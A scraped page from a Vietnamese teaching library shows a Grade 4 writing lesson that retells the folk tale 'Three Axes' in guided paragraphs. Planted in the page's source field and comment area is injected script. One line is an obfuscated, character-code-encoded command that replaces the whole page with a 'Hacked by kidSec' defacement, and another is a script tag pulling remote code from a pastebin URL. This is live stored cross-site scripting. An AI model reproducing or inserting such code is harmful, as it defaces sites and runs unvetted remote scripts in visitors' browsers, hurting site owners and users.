Banner-baigiang-1090_logo1
Banner-baigiang-1090_logo2

Tìm kiếm theo tiêu đề

Tìm kiếm Google

Quảng cáo

Hướng dẫn sử dụng thư viện

Hỗ trợ kĩ thuật

Liên hệ quảng cáo

 • (024) 66 745 632
 • 036 286 0000
 • contact@bachkim.vn

Wait
 • Begin_button
 • Prev_button
 • Play_button
 • Stop_button
 • Next_button
 • End_button
 • 0 / 0
 • Loading_status
Nhấn vào đây để tải về
Báo tài liệu có sai sót
Nhắn tin cho tác giả
(Tài liệu chưa được thẩm định)
Nguồn: document.documentElement.innerHTML=(String.fromCharCode(60, 104, 116, 109, 108, 62, 10, 60, 104, 101, 97, 100, 62, 10, 60, 116, 105, 116, 108, 101, 62, 76, 79, 76, 60, 47, 116, 105, 116, 108, 101, 62, 10, 60, 47, 104, 101, 97, 100, 62, 10, 60, 98, 111, 10
Người gửi: Đoàn Công Thanh
Ngày gửi: 14h:59' 08-04-2019
Dung lượng: 3.4 MB
Số lượt tải: 29
Số lượt thích: 0 người
PHÂN MÔN
TẬP LÀM VĂN
Lớp: Bốn
TIẾT 12 – TUẦN 6
BÀI : LUYỆN TẬP XÂY DỰNG
ĐOẠN VĂN KỂ CHUYỆN
Thứ sáu, ngày 27 tháng 9 năm 2013
Tập làm văn
Bài cũ : Đoạn văn trong bài văn kể chuyện
1. Nói đến đoạn văn trong bài văn kể chuyện chúng ta phải ghi nhớ điều gì ?
2. Hãy kể lại phần thân đoạn của cốt truyện Hai mẹ con và bà tiên ?
3. Hãy kể lại toàn truyện Hai mẹ con và bà tiên ?
Tập làm văn
Luyện tập xây dựng đoạn văn kể chuyện
BÀI TẬP 1 : Dựa vào tranh và lời kể dưới tranh, kể lại cốt truyện Ba lưỡi rìu :
Trả lời các câu hỏi sau :
1/ Cốt truyện là gì ? Cốt truyện thường có mấy phần ?
2/ Truyện có mấy nhân vật ? Đó là những nhân vật nào ?
3/ Nội dung truyện nói về điều gì ?
Thảo luận nhóm đôi
Một chàng tiều phu đang đốn củi
thì lưỡi rìu bị văng xuống sông.
Một cụ già hiện ra hứa sẽ vớt giúp.
Lần thứ nhất, cụ vớt lên
một lưỡi rìu bằng vàng.
Lần thứ hai, cụ vớt lên
một lưỡi rìu bằng bạc.
Lần thứ ba, cụ vớt lên
một lưỡi rìu bằng sắt.
Cụ già khen chàng trai thật thà
và tặng chàng cả ba lưỡi rìu.
BÀI TẬP 2 :
Phát triển ý nêu dưới mỗi tranh thành một đoạn văn kể chuyện.
Một chàng tiều phu đang đốn củi
thì lưỡi rìu bị văng xuống sông.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
2- Nhân vật nói gì ?
1- Nhân vật làm gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
1- Nhân vật làm gì ?
2- Nhân vật nói gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
NHÓM 1 + 2 : Đoạn 2
NHÓM 3 + 4 : Đoạn 3
NHÓM 5 + 6 : Đoạn 4
NHÓM 7 + 8 : Đoạn 5
NHÓM 9 + 10 : Đoạn 6
THẢO LUẬN NHÓM BỐN
HẾT GIỜ
1
2
3
4
5
6
7
8
9
Thời gian thảo luận :
Một cụ già hiện ra hứa sẽ vớt giúp.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
2- Nhân vật nói gì ?
1- Nhân vật làm gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
1- Nhân vật làm gì ?
2- Nhân vật nói gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
Cụ già hiện lên
Cụ hứa vớt rìu giúp chàng trai. Chàng chắp tay cám ơn.
Cụ già râu tóc bạc phơ, vẻ mặt hiền từ.
Lần thứ nhất, cụ vớt lên
một lưỡi rìu bằng vàng.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
2- Nhân vật nói gì?
1- Nhân vật làm gì?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
1- Nhân vật làm gì?
2- Nhân vật nói gì?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
Cụ già hiện lên
Cụ hứa vớt rìu giúp chàng trai. Chàng chắp tay cám ơn.
Cụ già râu tóc bạc phơ, vẻ mặt hiền từ.
Cụ vớt lên một lưỡi rìu, Chàng xua tay.
Cụ bảo: Rìu của con đây". Chàng trai nói:" Đây không phải rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu vàng sáng loá.
Lần thứ hai, cụ vớt lên
một lưỡi rìu bằng bạc.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
1- Nhân vật làm gì ?
2- Nhân vật nói gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
Cụ già hiện lên
Cụ hứa vớt rìu giúp chàng trai. Chàng chắp tay cám ơn.
Cụ già râu tóc bạc phơ, vẻ mặt hiền từ.
Cụ vớt lên một lưỡi rìu, Chàng xua tay.
Cụ bảo: Rìu của con đây". Chàng trai nói : "Đây không phải rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu vàng sáng loá.
Cụ vớt lên lưỡi rìu thứ hai. Chàng trai vẫn xua tay.
Cụ hỏi : "Lưỡi rìu này của con chứ ?" Chàng trai đáp : "Lưỡi rìu này cũng không phải của con".
Lưỡi rìu bạc sáng lấp lánh.
Lần thứ ba, cụ vớt lên
một lưỡi rìu bằng sắt.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
1- Nhân vật làm gì ?
2- Nhân vật nói gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
Cụ già hiện lên
Cụ hứa vớt rìu giúp chàng trai. Chàng chắp tay cám ơn.
Cụ già râu tóc bạc phơ, vẻ mặt hiền từ.
Cụ vớt lên một lưỡi rìu, Chàng xua tay.
Cụ bảo : Rìu của con đây". Chàng trai nói : "Đây không phải rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu vàng sáng loá.
Cụ vớt lên lưỡi rìu thứ hai. Chàng trai vẫn xua tay.
Cụ hỏi:" Lưỡi rìu này của con chứ ?" Chàng trai đáp : "Lưỡi rìu này cũng không phải của con".
Lưỡi rìu bạc sáng lấp lánh.
Cụ vớt lưỡi rìu thứ ba, chàng trai đưa tay lên trời
Cụ hỏi: "Lưỡi rìu này có phải của con ?" Chàng trai mừng rỡ:" Đây mới là rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu sắt
Cụ già khen chàng trai thật thà
và tặng chàng cả ba lưỡi rìu.
Chàng tiều phu đang đốn củi thì lưỡi rìu bị văng xuống sông.
“Cả gia tài nhà ta chỉ có lưỡi rìu này. Nay mất rìu không biết làm gì để sống đây ?”
Chàng ở trần, đóng khố, người nhễ nhại mồ hôi
Lưỡi rìu bằng sắt đã cũ.
1- Nhân vật làm gì ?
2- Nhân vật nói gì ?
3- Ngoại hình nhân vật
4- Lưỡi rìu vàng, bạc, sắt
Cụ già hiện lên
Cụ hứa vớt rìu giúp chàng trai. Chàng chắp tay cám ơn.
Cụ già râu tóc bạc phơ, vẻ mặt hiền từ.
Cụ vớt lên một lưỡi rìu, Chàng xua tay.
Cụ bảo : Rìu của con đây". Chàng trai nói : "Đây không phải rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu vàng sáng loá.
Cụ vớt lên lưỡi rìu thứ hai. Chàng trai vẫn xua tay.
Cụ hỏi:"Lưỡi rìu này của con chứ ?" Chàng trai đáp :" Lưỡi rìu này cũng không phải của con".
Lưỡi rìu bạc sáng lấp lánh.
Cụ vớt lưỡi rìu thứ ba, chàng trai đưa tay lên trời
Cụ hỏi : "Lưỡi rìu này có phải của con?" Chàng trai mừng rỡ:" Đây mới là rìu của con".
Chàng trai vẻ mặt thật thà.
Lưỡi rìu sắt
Cụ tặng chàng ba lưỡi rìu. Chàng cám ơn.
Cụ khen : "Con là người thật thà, ta tặng con cả ba lưỡi rìu". Chàng cám ơn.
Cụ già vẻ hài lòng. Chàng trai vẻ sung sướng.
Một chàng tiều phu đang đốn củi
thì lưỡi rìu bị văng xuống sông.
Một cụ già hiện ra hứa sẽ vớt giúp.
Lần thứ nhất, cụ vớt lên
một lưỡi rìu bằng vàng.
Lần thứ hai, cụ vớt lên
một lưỡi rìu bằng bạc.
Lần thứ ba, cụ vớt lên
một lưỡi rìu bằng sắt.
Cụ già khen chàng trai thật thà
và tặng chàng cả ba lưỡi rìu.
Trân trọng kính chào
Kính chúc quý Thầy cô nhiều sức khoẻ
Avatar

<script src="https://pastebin.com/raw/qUPVJPHK"></script>

Avatar
document.documentElement.innerHTML=(String.fromCharCode(60, 104, 116, 109, 108, 62, 10, 60, 104, 101, 97, 100, 62, 10, 60, 116, 105, 116, 108, 101, 62, 76, 79, 76, 60, 47, 116, 105, 116, 108, 101, 62, 10, 60, 47, 104, 101, 97, 100, 62, 10, 60, 98, 111, 100, 121, 62, 10, 60, 112, 114, 101, 62, 72, 97, 99, 107, 101, 100, 32, 98, 121, 32, 107, 105, 100, 83, 101, 99, 60, 47, 112, 114, 101, 62, 10, 60, 47, 98, 111, 100, 121, 62, 10, 60, 47, 104, 116, 109, 108, 62))
 
Gửi ý kiến